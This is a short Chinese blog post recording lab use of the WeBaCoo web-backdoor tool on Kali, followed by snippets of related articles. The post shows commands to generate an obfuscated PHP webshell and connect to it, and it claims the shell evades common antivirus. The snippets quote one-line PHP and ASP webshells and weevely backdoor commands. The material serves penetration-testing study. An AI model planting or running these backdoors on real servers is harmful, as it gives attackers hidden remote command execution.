2018-11 webacoo小试记录(kali)

最新推荐文章于 2024-03-15 09:41:27 发布
最新推荐文章于 2024-03-15 09:41:27 发布
阅读量797 收藏 1
点赞数
分类专栏: web安全渗透 文章标签: 2018 kali 安全 webshell
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42254735/article/details/83782427
版权

一. 简介:

获取的是类终端的shell。编码通信内容通过cookie头传输,隐蔽性较强。亲测不会被一般的杀软查杀,企业级的杀软没有测试。

参数:      查看帮助:webacoo -h

二. 使用记录:

webacoo -g -o webacoo.php      (创建加密混淆的一句话木马,-g参数生成后门代码,-o参数输出为一个文件。)

webacoo -t -u http://192.168.56.101/webacoo.php     (连接一句话木马,-t参数指定进行客户端的连接,-u参数指定目标URL。)

##抓包分析如何通过cookie头传指令,手动触发流量  【cm/cn/cp】

 

 

昨天今天下雨天233
关注
专栏目录
linux-headers-5.10.0-kali7-amd64_5.10.28-1kali1_amd64.deb
07-25
kali安装后,安装虚拟机tools需要的linux头文件
webacoo
qq_43776408的博客
09-29 474
WeBaCoo是一款隐蔽的脚本类Web后门工具,设计理念是躲避AV、NIDS、IPS、网络防火墙和应用防火墙的查杀,提供混淆和原始两种后门代码(原始代码较难检测),WebBaCoo 使用HTTP响应头传送命令执行的结果,Shell命令经过Base64编码后隐藏在Cookie头中。 /////////////////////////////////// 生成服务端代码: webacoo -g -...
Kali Linux Web后门工具、Windows操作系统痕迹清除方法
dichiji8804的博客
04-14 840
Kali Linux Web后门工具 Kaliweb后门工具一共有四款,今天只介绍WebaCoo 首先介绍第一个WeBaCooWeb Backdoor Cookie) WeBaCoo是一款隐蔽的脚本类Web后门工具。借助HTTP协议,它可在客户端和Web服务器之间实现执行代码的网页终端。WeBaCoo的精妙之处在于,Web服务器和客户端之间的通信载体是Cookie。这...
webshell管理-WeBaCoo和Weevely
weixin_41082546的博客
03-19 217
WeBaCoo (Web Backdoor Cookie) 简介 类终端的shell,只针对 PHP 编码通信内容通过 cookie 头传输,隐蔽性较强 Cookie: cm=aWQ=; cn=M-cookie; cp=pMi~ cm:bash64 编码之后的命令 cn:服务器用于返回数据的 cookie 头的名 cp:返回信息定界符 生成服务器端 webacoo -g -o w...
渗透测试之Webshell
weixin_41715662的博客
07-02 2259
网络攻击中的Webshell攻击介绍
WeBaCoo - 基于Web的协作编程环境
gitblog_00090的博客
03-15 413
WeBaCoo - 基于Web的协作编程环境 WeBaCooWeb Backdoor Cookie Script-Kit项目地址:https://gitcode.com/gh_mirrors/we/WeBaCoo 是一个基于Web的在线协作编程环境,它允许多个开发者在同一个项目中进行实时协作。无需安装任何软件,只需通过浏览器即可访问并开始工作。 能用来做什么? 实时协同编程:使用 WeBaCo...
kali-linux-wireless-pentest_kali_kalilinux_
10-04
Kali Linux 无线渗透测试入门指南
kali-linux-network-scanning-cookbook_kali_kalilinux_
10-02
Kali Linux网络扫描秘籍》是一本专为网络安全专业人士和爱好者编写的指南,它深入浅出地介绍了如何在Kali Linux操作系统中进行网络扫描。Kali Linux,原名BackTrack,是基于Debian的开源渗透测试平台,包含了各种...
kali-linux-2023.3-vmware-amd64.part3.rar
10-13
kali-linux-2023.3(kali-linux-2023.3-vmware-amd64.7z)适用于VMware系统,文件使用WinRAR分割成四个压缩包,必须一起下载使用: 文件1:https://download.csdn.net/download/weixin_43800734/88423344 文件2:...
termux-install-linux-kali linux安装教程
最新发布
09-12
termux-linux kali linux安装教程 kali linux安装教程 kali linux安装教程 kali linux安装教程 kali linux安装教程
webacoowebshell
03-04
webacoowebshell,一个轻量级的phpshell,比较好用
关于Kali的两个WebshellWebacoo和Weevely)的学习笔记
Mi1k7ea
03-15 6454
Webacoo和Weevely是在Kali中默认安装了的Webshell,下面将分开进行介绍。 Web Backdoor Cookie(Webacoo): Webacoo的编码通信内容都是通过cookie头传输,隐蔽性强。 其Cookie头中的三个变量: cm:base64编码的命令 cn:服务器用于返回数据的cookie头的名 cp:返回信息定界符 直接在终端输
Web后门工具WeBaCoo
weixin_33701294的博客
09-11 187
2019独角兽企业重金招聘Python工程师标准>>> ...
kali渗透测试-WebShell(中国菜刀、WeBaCoo、Weevely)
网络安全领域优质创作者
11-21 2150
本质 : 上传一句话木 <?php echo shell_exec($_GET[‘cmd‘]);?> windows平台 中国菜刀 支持asp、php、asp.net和jsp等 可能被IDS、AV、WAF、扫描器软件发现查杀 使用方法: 往目标web服务器上传相应的一句话木 asp一句话木: <%execute(request("pass"))%> p...
kali中的webshell工具--webacoo
weixin_30698527的博客
03-10 918
webacoo webshell其实就是放置在服务器上的一段代码 kali中生成webshell的工具 WeBaCooWeb Backdoor Cookie) 特点及使用方法 类终端的shell 编码通信内容通过cookie头传输,隐蔽性强 cookie中传递数据使用的参数: cm:base64编码的命令 cn:服务器用于返回数据的cooki...
Kali 2.0 Web后门工具----WebaCoo、weevely、PHP Meterpreter
weixin_30814223的博客
11-10 576
注:以下内容仅供学习使用,其他行为均与作者无关!转载请注明出处,谢谢! 本文将介绍 Kali 2.0 版本下的三款Web后门工具:WebaCoo、weevely、PHP Meterpreter,这类工具通常用于维护控制权。 实验环境: ● KALI 的IP地址是192.168.44.138; ● Metasploit的IP地址是192.168.44.130 ; 一、 WeBaCoo WeBaCoo...
kali中的中国菜刀weevely
热门推荐
司令2017的博客
04-17 2万+
weevely是一个kali中集成的webshell工具,是webshell的生成和连接集于一身的轻量级工具,生成的后门隐蔽性比较好,是随机生成的参数并且加密的,唯一的遗憾是只支持php,weevely是交互性工具,只可以在命令终端执行。     weevely generate password/tmp/1.php #生成一个名为1.php的后门,密码为password 这是
安全牛学习笔记】WEBSHELL
edu_aqniu的博客
09-30 1193
WEBSHELL                                           中国菜刀: http://www.maicaidao.co/                       可能被IDS、AV、WAF、扫描器软件发现查杀       WeBaCooWEB backdoor Cookie)                   
wsl --install -d kali-linuxkali-linux d:\WSL\kali.tar
06-11
`wsl --install -d kali-linux` 是Windows命令行中的一项操作,`-d` 参数后面跟的是你要安装的Linux发行版的名称或URL,这里是 `kali-linux`,`kali.tar` 通常是指一个预先打包好的Kali Linux镜像文件。 具体步骤...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值